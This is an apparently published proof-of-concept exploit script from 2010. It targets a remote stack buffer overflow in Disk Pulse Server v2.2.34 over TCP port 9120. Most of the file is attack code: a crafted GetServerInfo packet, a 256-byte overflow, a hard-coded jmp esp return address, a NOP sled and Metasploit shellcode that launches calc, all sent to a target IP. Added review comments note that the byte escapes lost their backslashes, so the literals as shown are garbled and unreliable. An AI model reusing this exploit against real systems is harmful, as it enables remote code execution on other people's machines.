# Title : Disk Pulse Server v2.2.34 Remote Buffer Overflow Exploit
# Published : 2010-10-12
# Author : xsploited security
#!/usr/bin/python
# Exploit Title: Disk Pulse Server v2.2.34 Remote Buffer Overflow Exploit
# Date: 10/11/2010
# Author: xsploited security
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] gmail.com
# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v2.2.34.exe
# Version: v2.2.34
# Tested on: Windows XP SP3 (Physical machine)
# CVE : N/A
# Vulnerability Information:
# A vulnerability exists in the way Disk Pulse Server v2.2.34 processes a remote client's "GetServerInfo" request.
# The vulnerability is caused due to a boundary error in libpal.dll when handling network messages and can be exploited
# to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 9120.
# Other notes:
# It appears the vendor likes using the same server code (that was affected by my previous PoC: http://www.exploit-db.com/exploits/15231)
# for everything client/server related. It is also safe to say that the client(s) are most likely affected by bugs as well.
# Other possibly affected versions:
# Disk Pulse Server <= 1.7.x
# References:
# http://secunia.com/advisories/41748/
# http://www.exploit-db.com/exploits/15231
# http://securityreason.com/exploitalert/9247
# Shouts:
# kAoTiX, MAX, CorelanCoder, exploit-db (of course), all other security crews and sites.
import sys,socket
# Proof-of-concept driver for the overflow described in the header above.
# NOTE(review): this listing is Python 2 (bare `print` statements) and its
# escape sequences lost their backslashes in extraction -- "x41", "n" and
# "rn" below read as plain ASCII letters, not the byte values the author
# intended -- so the literals are NOT the original bytes as shown here. The
# block indentation of the usage check below was lost the same way.
if len(sys.argv) != 2:
print "[!] Usage: ./diskpulse.py <Target IP>"
sys.exit(1)
# Banner. Each trailing "n" was a "\n" newline escape before extraction.
about = "=================================================n"
about += "Title: Disk Pulse Server v2.2.34 Remote BOF PoCn"
about += "Author: xsploited securitynURL: http://www.x-sploited.com/n"
about += "Contact: xsploitedsecurity [at] gmail.comn"
about += "=================================================n"
print about
host = sys.argv[1]
# Default server port; matches the TCP 9120 named in the header. From the
# defender's side, the exposed surface is this listener: restricting who can
# reach it limits who can reach the vulnerable request handler.
port = 9120 #default server port
# Shellcode blob, described by the author as Metasploit windows/exec
# (218 bytes, x86/fnstenv_mov encoded, EXITFUNC=seh, CMD=calc). Not decoded
# or verified here; as extracted it is ASCII text (see note at top).
# windows/exec - 218 bytes / http://www.metasploit.com
# Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc
calc = ("x6ax31x59xd9xeexd9x74x24xf4x5bx81x73x13x97x8c"
"x8ax10x83xebxfcxe2xf4x6bx64x03x10x97x8cxeax99"
"x72xbdx58x74x1cxdexbax9bxc5x80x01x42x83x07xf8"
"x38x98x3bxc0x36xa6x73xbbxd0x3bxb0xebx6cx95xa0"
"xaaxd1x58x81x8bxd7x75x7cxd8x47x1cxdex9ax9bxd5"
"xb0x8bxc0x1cxccxf2x95x57xf8xc0x11x47xdcx01x58"
"x8fx07xd2x30x96x5fx69x2cxdex07xbex9bx96x5axbb"
"xefxa6x4cx26xd1x58x81x8bxd7xafx6cxffxe4x94xf1"
"x72x2bxeaxa8xffxf2xcfx07xd2x34x96x5fxecx9bx9b"
"xc7x01x48x8bx8dx59x9bx93x07x8bxc0x1exc8xaex34"
"xccxd7xebx49xcdxddx75xf0xcfxd3xd0x9bx85x67x0c"
"x4dxfdx8dx07x95x2ex8cx8ax10xc7xe4xbbx9bxf8x0b"
"x75xc5x2cx72x84x22x7dxe4x2cx85x2ax11x75xc5xab"
"x8axf6x1ax17x77x6ax65x92x37xcdx03xe5xe3xe0x10"
"xc4x73x5fx73xf6xe0xe9x10");
# Begin payload buffer:
# Request name the server dispatches on, per the author "GetServerInfo"
# followed by a 0x02 byte. On the wire, this request name followed by a long
# run of identical filler bytes (next line) is the observable signature of
# this PoC, which is what a network detection rule for it would key on.
packet_header = ("x47x65x74x53x65x72x76x65x72x49x6Ex66x6Fx02"); # ASCII = "GetServerInfo."
junk = "x41" * 256; #256 byte junk buffer to reach eip (author's stated offset)
# Hard-coded return-address overwrite; the author attributes it to a jmp esp
# in ws2_32.dll on the Windows XP SP3 test system named in the header, so it
# is presumably specific to that module layout.
eip = "xFBxF8xABx71"; #jmp esp (via ws2_32.dll)
nops = "x90" * 12; #small nop sled
# packet structure:
# [header][junk][eip][nops][shellcode][nops][nops]
packet = packet_header + junk + eip + nops + calc + nops + nops;
# The trailing "r" on the status lines was a "\r" escape before extraction.
print "[*] Connecting to " + host + "...r"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# No error handling around connect(): a refused or timed-out connection
# raises socket.error and the script exits with a traceback.
s.connect((host,port))
print "[*] Connected, Sending payloadr"
# Single send of the whole buffer; "rn" was "\r\n" before extraction. The
# return value (bytes actually written) is not checked.
s.send(packet + "rn")
print "[*] Payload sent successfully"
print "[*] Check the resultsr"
s.close()